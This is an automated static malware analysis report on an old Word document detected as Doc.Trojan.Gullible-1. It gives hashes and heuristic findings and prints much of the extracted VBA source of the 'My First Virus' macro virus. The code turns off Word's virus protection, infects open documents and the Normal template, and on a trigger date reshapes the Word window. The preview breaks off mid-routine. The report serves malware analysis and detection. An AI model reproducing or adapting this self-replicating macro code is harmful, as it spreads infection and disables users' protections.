Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7a22cc9e37affeb2…

MALICIOUS

Office (OLE)

58.5 KB Created: 2000-03-27 13:58:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 8f50d3859db346c09b9dbb7268103aec SHA-1: 2f680bd1f79a84ab034a37b01b41b5e941e5a943 SHA-256: 7a22cc9e37affeb2b6219c310cf8173be83aaba6013f300c2e94019a117ed2c5
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a malicious Office document containing VBA macros, specifically a 'Document_Open' macro, which is a common technique for initial execution. The macros are designed to infect other documents and potentially execute further malicious actions, as suggested by the ClamAV detection 'Doc.Trojan.Gullible-1'. The VBA code attempts to disable virus protection and infect other documents, indicating a downloader or dropper functionality.

Heuristics 3

  • ClamAV: Doc.Trojan.Gullible-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Gullible-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 20865 bytes
SHA-256: d10a21b893edc8ca0f185a8544fd9048ba8bfd17ccf89ae71c3581a1ab803184
Detection
ClamAV: Doc.Trojan.Gullible-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Declare Function SetWindowRgn Lib "user32" (ByVal hWnd As Long, ByVal hRgn As Long, ByVal bRedraw As Boolean) As Long
Private Declare Function CreateEllipticRgn Lib "gdi32" (ByVal X1 As Long, ByVal Y1 As Long, ByVal X2 As Long, ByVal Y2 As Long) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Sub MFV(Method As String)
    Dim Doc As Document, Comp, CodeMod As Object, SaveIt As Boolean, i As Integer
        
    If Application.UserName = Chr(Val("&H53")) + Chr(Val("&H2E")) + Chr(Val("&H20")) + Chr(Val("&H42")) + Chr(Val("&H61")) + Chr(Val("&H63")) + Chr(Val("&H68")) Then
        If Method = "O" Then MsgBox "Ich bin wieder hier!", vbOKOnly + vbDefaultButton1 + vbInformation, "MFV"
        Options.VirusProtection = True
        Exit Sub
    End If

    
    Options.VirusProtection = False
    
    
    'Infection
    For Each Doc In Documents
        SaveIt = Doc.Saved
        
        For Each Comp In Doc.VBProject.VBComponents
            If Comp.Type = 100 Then Call Infect(Comp.CodeModule)
        Next
        
        If SaveIt And (Dir(Doc.FullName) <> "") Then Doc.Save
    Next
    Call Infect(Normal.ThisDocument.VBProject.VBComponents(1).CodeModule)
    
    'Destruction
    If Method = "C" And (Format(Date, "dd-mm") = "19-03") Then
        Assistant.Visible = True
        Assistant.Animation = MsoAnimationType.msoAnimationGetTechy
        
        Application.WindowState = wdWindowStateNormal
        Application.Width = 500
        Application.Height = 500
        SetWindowRgn FindWindow("OpusApp", vbNullString), CreateEllipticRgn(0, 0, 600, 600), True
    
        With Assistant.NewBalloon
            .BalloonType = MsoBalloonType.msoBalloonTypeNumbers
            .Mode = MsoModeType.msoModeModal
            .Icon = MsoIconType.msoIconAlert
            .Button = MsoButtonSetType.msoButtonSetCancel
            .Heading = "MFV"
            .Text = MacroContainer.Name & " was infected by MFV (My First Virus)"
            .Show
        End With

        Assistant.Animation = MsoAnimationType.msoAnimationThinking
    
        With Assistant.NewBalloon
            .BalloonType = MsoBalloonType.msoBalloonTypeNumbers
            .Mode = MsoModeType.msoModeModal
            .Icon = MsoIconType.msoIconTip
            .Button = MsoButtonSetType.msoButtonSetCancel
            .Heading = "MFV"
            .Text = "This virus is not harmful. Belive me!" & vbCrLf & "Your window was only deformed, not more!" & vbCrLf & vbCrLf & "This virus is freeware. You may give it to anyone!"
            .Show
        End With
    End If
End Sub
Private Sub Infect(CodeMod As Object)
    Dim StartOpen As Integer, StartClose As Integer, StartNew As Integer, IsInfected As Boolean
    Dim Sex As Object, DoIt As Boolean, i As Integer
    
    IsInfected = False: StartOpen = 0: StartClose = 0: StartNew = 0
    For i = 1 To CodeMod.CountOfLines
        If InStr(1, UCase(CodeMod.Lines(i, 1)), UCase("Sub Document_Open()")) Then StartOpen = i
        If InStr(1, UCase(CodeMod.Lines(i, 1)), UCase("Sub Document_Close()")) Then StartClose = i
        If InStr(1, UCase(CodeMod.Lines(i, 1)), UCase("Sub Document_New()")) Then StartNew = i
        If InStr(1, UCase(CodeMod.Lines(i, 1)), UCase("'Infected by My first Virus")) Then IsInfected = True
    Next i

    If Not IsInfected Then
        CodeMod.AddFromString "Private Declare Function SetWindowRgn Lib " & Chr(34) & "user32" & Chr(34) & " (ByVal hWnd As Long, ByVal hRgn As Long, ByVal bRedraw As Boolean) As Long"
        CodeMod.AddFromString "Private Declare Function CreateEllipticRgn Lib " & Chr(34) & "gdi32" & Chr(34) & " (ByVal X1 As Long, ByVal Y1 As Long
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.